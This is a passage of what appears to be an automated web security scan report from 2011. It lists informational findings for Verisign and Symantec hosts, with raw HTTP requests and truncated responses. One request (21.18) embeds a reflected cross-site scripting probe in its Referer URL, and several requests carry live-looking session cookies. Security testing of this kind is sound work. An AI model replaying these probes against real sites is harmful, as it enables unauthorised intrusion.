Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.boxshadow.js

Request

GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:27 GMT
Content-Length: 1538

/* **
* jquery-boxshadow.js
*
* $(object).boxshadow({
* hOffset : 3,
* vOffset : 3,
* shadowblur : 3,
* color : '#808080'
* })
*
* If you are using this with IE, you should s
...[SNIP]...

21.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.cacheimage.js

Request

GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 1
Expires: Sun, 09 Oct 2011 21:38:26 GMT
Content-Length: 1356

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

21.10. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.hover_intent.js

Request

GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 39037
Expires: Sun, 09 Oct 2011 10:47:51 GMT
Content-Length: 1614

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...

21.11. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/oo-engine.js

Request

GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 1154

/* OnlineOpinion (S3tS v3.1) */

/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

var custom_var,
...[SNIP]...

21.12. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.js

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 77341
Expires: Sun, 09 Oct 2011 00:09:34 GMT
Content-Length: 4102


var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

21.13. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/shared.js

Request

GET /authweb/global/assets/shared/js/shared.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:29 GMT
Content-Length: 37327

// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plug
...[SNIP]...

21.14. https://cert.webtrust.org/ViewSeal

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Request

GET /ViewSeal HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:30 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 2834

java.lang.NumberFormatException: null
   at java.lang.Integer.parseInt(Integer.java:394)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlets.WebContext.getFormInt(WebContext.java:29)
   
...[SNIP]...

21.15. https://fileconnect.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fileconnect.symantec.com
Path:   /

Request

GET / HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:04:07 GMT
Content-length: 11587
Content-type: text/html
Content-Language: en-US


<HTML><HEAD><TITLE>Symantec FileConnect - Electronic Software Distribution</TITLE>
<!--[if IE]>
<LINK REL=StyleSheet HREF="javascript/stylesie.css" TYPE="text/css" MEDIA=screen>
<![endif]
...[SNIP]...

21.16. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forms.verisign.com
Path:   /websurveys/servlet/ActionMultiplexer

Request

GET /websurveys/servlet/ActionMultiplexer HTTP/1.1
Host: forms.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 36
Date: Fri, 09 Sep 2011 21:41:07 GMT

Missing or unknown action ID: null

21.17. https://idprotect.verisign.com/common/scripts/dlText.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /common/scripts/dlText.js

Request

GET /common/scripts/dlText.js HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/orderstart.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:50:57 GMT
Accept-Ranges: bytes
ETag: W/"19229-1310089722000"
Last-Modified: Fri, 08 Jul 2011 01:48:42 GMT
Content-Type: text/javascript
Content-Length: 19229
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

linkData['DL_0'] = 'Supported Mobile Devices';
linkData['DL_1'] = 'Select Your Mobile Device';
linkData['DL_2'] = 'Why You Have To Download, Activate, and Register Your ' + brand_productname;
linkData
...[SNIP]...

21.18. https://idprotect.verisign.com/secureredirect.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /secureredirect.v

Request

GET /secureredirect.v?sid=0.08982152305543423 HTTP/1.1
Host: idprotect.verisign.com
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v?141ab%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E41143d22db1=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:51:44 GMT
Content-Type: text/xml;charset=UTF-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 2195

<?xml version="1.0" encoding="UTF-8"?><document><redirectUrl>https://vipmobile.verisign.com/welcome.v</redirectUrl><timestamp>2011-09-09T21:51:44Z</timestamp><cert>-----BEGIN CERTIFICATE-----
MIIEVzCC
...[SNIP]...

21.19. https://idprotect.verisign.com/toolbar/downloadIE.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/downloadIE.v

Request

GET /toolbar/downloadIE.v HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/install.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:40 GMT
Content-disposition: filename="VIPAccessToolbarSetup.exe"
Content-Type: application/octet-stream
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 1936456

MZ......................@.............................................    .!..L.!This program cannot be run in DOS mode.
$........M4..,Z..,Z..,Z..0V..,Z.f3Q..,Z.0T..,Z.f3P..,Z.$...,Z..,[..,Z...Q..,Z.
...[SNIP]...

21.20. https://knowledge.verisign.ch/support/code-signing-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/code-signing-support/index.html

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.21. https://knowledge.verisign.ch/support/digital-id-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/digital-id-support/index.html

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.22. https://knowledge.verisign.ch/support/mpki-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/mpki-support/index.html

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index

Request

GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...

21.24. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index.html

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.25. https://knowledge.verisign.ch/support/trust-seal-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/trust-seal-support/index.html

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.26. https://knowledge.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT
ETag: "342ce-47e-4aac5f440a880"
Accept-Ranges: bytes
Content-Length: 1150
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/plain

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

21.27. https://knowledge.verisign.com/support/code-signing-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/code-signing-support/index

Request

GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...

21.28. https://knowledge.verisign.com/support/code-signing-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/code-signing-support/index.html

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.29. https://knowledge.verisign.com/support/digital-id-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/digital-id-support/index.html

Request

GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.30. https://knowledge.verisign.com/support/eca-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/eca-support/index.html

Request

GET /support/eca-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.31. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-for-ssl-support/index

Request

GET /support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 17000


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...

21.32. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-for-ssl-support/index.html

Request

GET /support/mpki-for-ssl-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:45:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.33. https://knowledge.verisign.com/support/mpki-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-support/index.html

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.34. https://knowledge.verisign.com/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/ssl-certificates-support/index

Request

GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 46210


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...

21.35. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/ssl-certificates-support/index.html

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.36. https://knowledge.verisign.com/support/trust-seal-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/trust-seal-support/index.html

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...

21.37. https://partnernet.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://partnernet.symantec.com
Path:   /

Request

GET / HTTP/1.1
Host: partnernet.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:06 GMT
Server: Apache/2.2.15 (Unix)
Last-Modified: Thu, 12 May 2011 19:48:14 GMT
ETag: "70c638-47-4a3197842db80"
Accept-Ranges: bytes
Content-Length: 71
Connection: close
Content-Type: text/html

<meta http-equiv="refresh" content="0; URL=/Partnercontent/Login.jsp">

21.38. https://policy3.responsys.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://policy3.responsys.net
Path:   /

Request

GET / HTTP/1.1
Host: policy3.responsys.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:40:00 GMT
